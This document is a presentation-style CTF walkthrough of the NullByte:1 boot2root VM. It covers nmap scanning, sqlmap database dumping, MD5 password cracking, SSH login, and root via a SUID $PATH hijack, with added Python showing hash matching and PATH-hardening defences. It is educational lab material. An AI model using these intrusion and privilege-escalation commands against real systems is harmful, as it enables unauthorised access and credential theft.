EXPLOITING NULL BYTE VM
(CTF CHALLENGE)
BY DEVANSH DUBEY
DATE: 21 April 2019
ABOUT ME
• Devansh Dubey
• Volunteer at NULL Bhopal
• Undergoing graduation from UIT RGPV
• Cyber Security enthusiast
• Twitter handle: @devanshdubey97
About Null Byte VM
• Name: NullByte: 1
• Codename: NB0x01
• Release date: 1 Aug 2015
• Author: ly0n
• Series: NullByte
• Web page: http://ly0n.me/2015/08/01/nullbyte-challenge-0x01/?
• Download: ly0n.me/nullbyte/NullByte.ova.zip
• Objective: Get to /root/proof.txt and follow the instructions.
• Level: Basic to intermediate.
• Description: Boot2root, box will get IP from dhcp, works fine with virtualbox & vmware.
• Operating System: Linux
Our Agenda:
• Network scanning (netdiscover, Nmap)
• Extracting hidden text from an image served by the target IP (ExifTool)
• Dictionary attack using rockyou.txt (Burp Suite) to obtain the key
• Obtaining database information via sqlmap
• Login to SSH on port 777
• Finding SUID binaries
• Privilege escalation by manipulating $PATH
• Getting root access and capturing the flag (proof.txt)
LET'S BEGIN
1. Netdiscover:
Netdiscover is an ARP scanner that finds live hosts in a network range. In the first step we locate the target with netdiscover, a command-line tool shipped with Kali Linux:
• netdiscover -r 172.16.219.0/24
NETDISCOVER RESULT
Our target is 172.16.219.142. Now that we know the target, we scan it with nmap.
2. Nmap Scan
• Our target is 172.16.219.142; we scan it with nmap.
• nmap -A 172.16.219.142
-A: enables OS detection, version detection, script scanning and traceroute.
• The scan shows that ports 80, 111, 777 and 44607 are open, and that the SSH service runs on port 777 instead of the default 22. Next we open the target IP in the browser.
NMAP RESULTS
3. Exiftool:
The page shows an image and a quote. Neither the page nor its source reveals anything, so the data may be hidden inside the image. To read the image metadata we use exiftool, an open source tool available on GitHub.
Available on: https://github.com/exiftool/exiftool
In its output you will find a Comment field containing kzMb5nVYJw. This might be a directory name, so we open it in the browser. It serves a page with a text field that asks for a KEY.
APPLY DICTIONARY ATTACK TO GET KEY
4. Dictionary Attack
• The page asks for a key. Since it is a plain text field, we run a dictionary attack against it with Burp Suite and rockyou.txt (a wordlist file available in the /usr/share/wordlist directory). The dictionary attack finds the key: elite.
5. Using sqlmap:
• After entering the key elite in the text field, a new page opens that asks for a username, which we do not yet know. We look for it in the application's database with sqlmap:
• sqlmap -u "http://172.16.219.142/kzMb5nVYJw/420search.php?usrtosearch=1" --dbs --batch
--batch: never ask for user input, use the default behaviour.
--dbs: enumerate the databases.
It returns the database names: information_schema, mysql, performance_schema, seth.
6. Next we dump the tables and columns of the seth database; for that type:
• sqlmap -u "http://172.16.219.142/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth --dump-all --batch
• --dump-all: dump all entries of the selected database.
• Once the command completes, it shows the table name along with the columns and the password, as shown:
Now we know the username is ramses and that the password is not stored in plain text.
7. Password decoding:
• We have the username, but the password value is not in plain text, so we need to crack it; there are many online tools for this.
• First decode the value with base64:
• $ echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=" | base64 -d
• The result is an MD5 hash. To crack it, go to md5decoder.org, paste the MD5 value there and click OK; it shows the original word: omega.
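A worked version of step 7, added here and not part of the original slides: it base64-decodes the dumped value, recognises the 32-hex-character shape of an unsalted MD5 digest, and shows why a site like md5decoder.org answers instantly (it hashes wordlist entries and compares; nothing is "decrypted"). The scrypt functions show how the application should have stored the password so that a database dump no longer yields it. The wordlist is a constructed stand-in for rockyou.txt.

```python
import base64
import hashlib
import hmac
import os
import re
from typing import Iterable, Optional

# Value the sqlmap dump returned for user ramses (taken from the page).
PAGE_B64 = "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE="

# Constructed stand-in for a handful of rockyou.txt lines (the real list has millions).
CONSTRUCTED_WORDLIST = ["123456", "password", "elite", "omega", "letmein"]

MD5_HEX = re.compile(r"^[0-9a-f]{32}$")


def decode_stored_value(b64_value: str) -> str:
    """Step one of the page: the same thing `base64 -d` does."""
    return base64.b64decode(b64_value).decode("ascii").strip()


def looks_like_md5(value: str) -> bool:
    """32 lowercase hex characters is the tell-tale shape of an unsalted MD5 digest."""
    return bool(MD5_HEX.match(value))


def wordlist_lookup(md5_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """What an online 'MD5 decoder' does: hash each candidate and compare.
    Without a salt the same password always yields the same digest, so a
    precomputed table answers instantly; MD5 is never reversed, only matched."""
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == md5_hex:
            return candidate
    return None


# The defender's side: how the web application should have stored the password.

def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted scrypt from the standard library; format scrypt$<salt hex>$<key hex>.
    A fresh random salt per user defeats precomputed tables, and the work factor
    makes each wordlist guess cost milliseconds instead of nanoseconds."""
    salt = salt or os.urandom(16)
    key = hashlib.scrypt(password.encode(), salt=salt, n=2 ** 14, r=8, p=1, dklen=32)
    return f"scrypt${salt.hex()}${key.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    algo, salt_hex, key_hex = stored.split("$")
    if algo != "scrypt":
        return False
    key = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                         n=2 ** 14, r=8, p=1, dklen=32)
    return hmac.compare_digest(key.hex(), key_hex)


if __name__ == "__main__":
    digest = decode_stored_value(PAGE_B64)
    print("decoded:", digest, "| md5-shaped:", looks_like_md5(digest))
    print("wordlist hit:", wordlist_lookup(digest, CONSTRUCTED_WORDLIST))  # → omega
    stored = hash_password("omega")
    print("salted store:", stored)
    print("verify omega:", verify_password("omega", stored))  # → True
    # The same wordlist scan finds nothing against the salted, slow store.
    print("hit on salted store:", wordlist_lookup(stored, CONSTRUCTED_WORDLIST))  # → None
```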
8. Login through SSH
Now we log in over SSH; for that type:
• ssh ramses@172.16.219.142 -p 777
• When prompted, give omega as the password. Once logged in, the following command enumerates all binaries that have the SUID bit set:
• find / -perm -u=s -type f 2>/dev/null
• Here we find that the SUID bit is enabled on /var/www/backup/procwatch
SUID ENABLED
9. Privilege Escalation
• cd /var/www/backup/
• ./procwatch
Procwatch is a security monitor written in Perl that watches the /proc filesystem for new processes. When a process is created, procwatch reports the time, the username, the PID and the binary that was run. Its output is suitable for logging to log files and is geared towards system administrators who are testing a new but as yet untrusted UNIX system.
procwatch is owned by root and has the SUID bit set, which means the file runs with root privileges.
10. Privilege Escalation
• echo "/bin/sh" > ps
• chmod 777 ps
• echo $PATH
• export PATH=.:$PATH
• echo $PATH
• ./procwatch
• With '.' in $PATH, commands are looked up in the current directory first, so when procwatch calls ps it runs our script instead, and because procwatch is SUID root the shell it spawns runs as root. Running id now shows that we are root.
• id
• cd /root
• ls
• cat proof.txt
FLAG FOUND!!
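Why step 10 works, and what a SUID helper should do instead, as an added Python model that is not part of the original slides: it reproduces the left-to-right PATH search a shell or execvp performs, shows the lookup flipping from /bin/ps to the attacker's ./ps once '.' (or an empty entry) leads $PATH, and contrasts that with a hardened lookup that ignores the inherited environment. The filesystem is a constructed set of paths and SAFE_PATH is an assumed value.

```python
import os
from typing import Callable, List, Optional

# Trusted search path a privileged program should set for itself instead of
# inheriting the caller's environment (assumed value; pick what your distro uses).
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"

# Constructed stand-in for the filesystem in step 10: the real ps plus the
# `ps` script written into the current directory.
CONSTRUCTED_FS = {"/bin/ps", "./ps"}


def resolve_like_execvp(command: str, path_env: str,
                        exists: Callable[[str], bool]) -> Optional[str]:
    """Mimic how a shell (or execvp) finds a bare command name: walk PATH left
    to right and return the first entry holding a file of that name.  An empty
    entry means the current directory, exactly like '.'."""
    for entry in path_env.split(":"):
        candidate = os.path.join(entry or ".", command)
        if exists(candidate):
            return candidate
    return None


def risky_path_entries(path_env: str) -> List[str]:
    """PATH entries the unprivileged caller controls: '.', '' and any relative
    directory.  A SUID program that inherits such a PATH can be redirected."""
    return [e for e in path_env.split(":") if e == "" or not e.startswith("/")]


def resolve_hardened(command: str, exists: Callable[[str], bool]) -> Optional[str]:
    """What a SUID helper should do: ignore the inherited PATH entirely and
    search only a fixed list of absolute, root-owned directories (or call the
    binary by absolute path in the first place)."""
    return resolve_like_execvp(command, SAFE_PATH, exists)


def explain(path_env: str) -> str:
    """Summarise, for a given PATH, where `ps` is found by procwatch-style code
    that trusts the environment versus the hardened lookup."""
    naive = resolve_like_execvp("ps", path_env, CONSTRUCTED_FS.__contains__)
    safe = resolve_hardened("ps", CONSTRUCTED_FS.__contains__)
    return (f"PATH={path_env!r}: inherited lookup -> {naive}, "
            f"hardened lookup -> {safe}, risky entries={risky_path_entries(path_env)}")


if __name__ == "__main__":
    print(explain("/usr/local/bin:/usr/bin:/bin"))    # normal user PATH
    print(explain(".:/usr/local/bin:/usr/bin:/bin"))  # after `export PATH=.:$PATH`
    print(explain("/usr/bin::/bin"))                  # empty entry, same effect as '.'
```

The risky_path_entries check is also a cheap audit to run over login shells and cron environments on a host where SUID helpers exist.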
REFERENCES
• Website: http://ly0n.me/2015/08/01/nullbyte-challenge-0x01/
• Download: http://ly0n.me/nullbyte/NullByte.ova.zip
• Download (Mirror): https://download.vulnhub.com/nullbyte/NullByte.ova.zip
• Download (Torrent): https://download.vulnhub.com/nullbyte/NullByte.ova.zip.torrent    ( Magnet)?
• https://github.com/Hamza-Megahed/CTFs/blob/master/NullByte/README
• https://www.hackingarticles.in/hack-nullbyte-vm-ctf-challenge/
• https://resources.infosecinstitute.com/nullbyte-walkthrough/#gref
• https://www.thegeekdiary.com/what-is-suid-sgid-and-sticky-bit/
• http://eng.omegaton.com/2017/04/null-byte-report.html
Any Questions……??